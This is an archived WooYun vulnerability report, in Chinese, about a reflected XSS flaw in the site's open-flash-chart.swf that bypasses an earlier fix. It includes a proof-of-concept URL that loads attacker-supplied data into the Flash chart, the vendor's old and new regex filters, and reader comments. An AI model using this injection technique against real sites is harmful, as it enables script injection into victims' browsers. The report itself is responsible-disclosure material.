漏洞概要
关注数(34)
关注此漏洞
漏洞标题: 乌云主站存在一处反射型XSS漏洞
提交时间: 2014-04-17 11:16
公开时间: 2014-04-17 11:20
漏洞类型: XSS 跨站脚本攻击
危害等级: 中
自评Rank: 10
漏洞状态:
厂商已经确认
漏洞详情
披露状态:
2014-04-17: 细节已通知厂商并且等待厂商处理中
2014-04-17: 厂商已经确认,细节仅向厂商公开
2014-04-17: 厂商提前公开漏洞,细节向公众公开
简要描述:
你们能给我500万吗
详细说明:
无良厂商乌云对善良可爱的心伤的胖子的漏洞(http://drops.wooyun.org/papers/382)的修复太简单了,仅仅是从URL层上过滤。但是你们too young了好吗,狡诈的flash根本就不是你们想象得那么单纯,它的世界观和你们根本不一样,三观不一样,怎么能够在一起。
看这里
http://drops.wooyun.org/papers/948
看这里
http://www.wooyun.org/ofc/open-flash-chart.swf?data=/ajaxdo.php?module=corptypecount%26type=%26id=1350&da%sta=http://localhost/xss.txt
漏洞证明:
再看这里
修复方案:
版权声明:转载请注明来源 p.z@乌云
漏洞回应
厂商回应:
危害等级:低
漏洞Rank:5
确认时间:2014-04-17 11:17
厂商回复:
漏洞真实存在,非常感谢洞主的提交
最新状态:
2014-04-17:之前修复的方法:
preg_match('/^\/ajaxdo\.php\?module/is',$_GET['data'])
没有考虑flash的特殊认知
现在的临时解决方案:
preg_match('/^data=\/ajaxdo\.php\?module=\w+?%26type=\w*?%26id=\d+?(%26year=\d{4})?$/is'
严格匹配链接
正在寻找最新无漏洞的openflashchart.swf,测试无误则替换
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共3人评价):
评价
-
2014-04-17 11:20 |
疯狗 
( 实习白帽子 |
Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
3
-
2014-04-17 11:21 |
梧桐雨
( 核心白帽子 |
Rank:1643 漏洞数:189 | 学无止境)
1
-
2014-04-17 11:25 |
blue
( 普通白帽子 |
Rank:779 漏洞数:70 | 我心中有猛虎,细嗅蔷薇。)
0
-
2014-04-17 11:53 |
我是壮丁
( 实习白帽子 |
Rank:40 漏洞数:2 | 专业打酱油)
1
-
2014-04-17 11:55 |
李旭敏
( 普通白帽子 |
Rank:790 漏洞数:111 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)
1
-
2014-04-17 12:11 |
寂寞的瘦子
( 普通白帽子 |
Rank:242 漏洞数:53 | ☯☯☯☯☯☯☯☯☯☯)
0
-
2014-04-17 13:16 |
乌云白帽子
( 路人 |
Rank:19 漏洞数:8 | 路人甲)
0
-
2014-04-17 13:18 |
X,D
( 普通白帽子 |
Rank:143 漏洞数:8 | X,D)
0
-
2014-04-17 14:23 |
ahnhhh
( 路人 |
Rank:7 漏洞数:3 | 你在乌云这么吊,你家人知道么?)
0
-
2014-04-17 14:40 |
风花雪月
( 实习白帽子 |
Rank:67 漏洞数:49 | []+[]|[]-[][][][][]%[][]|[]\[]%[][]|[]\[...)
0
-
2014-04-17 15:07 |
wa3lker
( 路人 |
Rank:0 漏洞数:1 | 酱油党)
0
-
2014-04-17 16:56 |
小贱人
( 路人 |
Rank:4 漏洞数:3 | 资深菜鸟,)
0
-
2014-04-17 20:00 |
abaddon
( 实习白帽子 |
Rank:37 漏洞数:10 | 我叫什么名字)
0
-
2014-04-17 20:15 |
redsin
( 路人 |
Rank:16 漏洞数:6 )
0
-
2014-04-18 11:54 |
possible
( 普通白帽子 |
Rank:373 漏洞数:32 | everything is possible!)
0
-
2014-04-18 20:14 |
abaddon
( 实习白帽子 |
Rank:37 漏洞数:10 | 我叫什么名字)
0
-
2014-04-19 14:23 |
piaoye
( 普通白帽子 |
Rank:343 漏洞数:53 | ww)
0
http://zone.wooyun.org/content/4997 很早前没提交
-
2014-04-20 22:02 |
小贱人
( 路人 |
Rank:4 漏洞数:3 | 资深菜鸟,)
0
@xsser 我的漏洞总是很晚审核 然后通不过,请剑心能否解答下?phpok 盲打后台我报了你们不给过 别人报了就给过,什么意思?
-
2014-04-20 22:02 |
小贱人
( 路人 |
Rank:4 漏洞数:3 | 资深菜鸟,)
0
深圳图书馆绕过限制上外网 别人报了通过,我报了你们一直卡在现在 什么意思?
-
2014-05-01 02:36 |
Anonymous.L
( 实习白帽子 |
Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)
0
-
2014-05-01 07:22 |
abaddon
( 实习白帽子 |
Rank:37 漏洞数:10 | 我叫什么名字)
0
-
2014-05-01 13:36 |
Anonymous.L
( 实习白帽子 |
Rank:37 漏洞数:8 | 最后一位关注xxxx的人 , 孤独之人)
0
@abaddon 哥们,你主要是做哪方面的啊???
-
2014-05-02 04:31 |
佩佩
( 实习白帽子 |
Rank:62 漏洞数:8 | 一个热衷于网络安全的白帽子,具有很强的逻...)
0
-
2014-05-06 20:08 |
大脸娃娃
( 路人 |
Rank:20 漏洞数:4 | 莫西莫西 呼啦嘚)
0
-
2014-05-06 20:54 |
YMSZ07
( 路人 |
Rank:0 漏洞数:1 | 信息安全学习者,希望与更多的朋友交流)
0
-
2014-05-13 10:26 |
小贱人
( 路人 |
Rank:4 漏洞数:3 | 资深菜鸟,)
0
-
2014-05-30 10:50 |
by小星星
( 路人 |
Rank:4 漏洞数:4 | 我会唱小星星、)
0
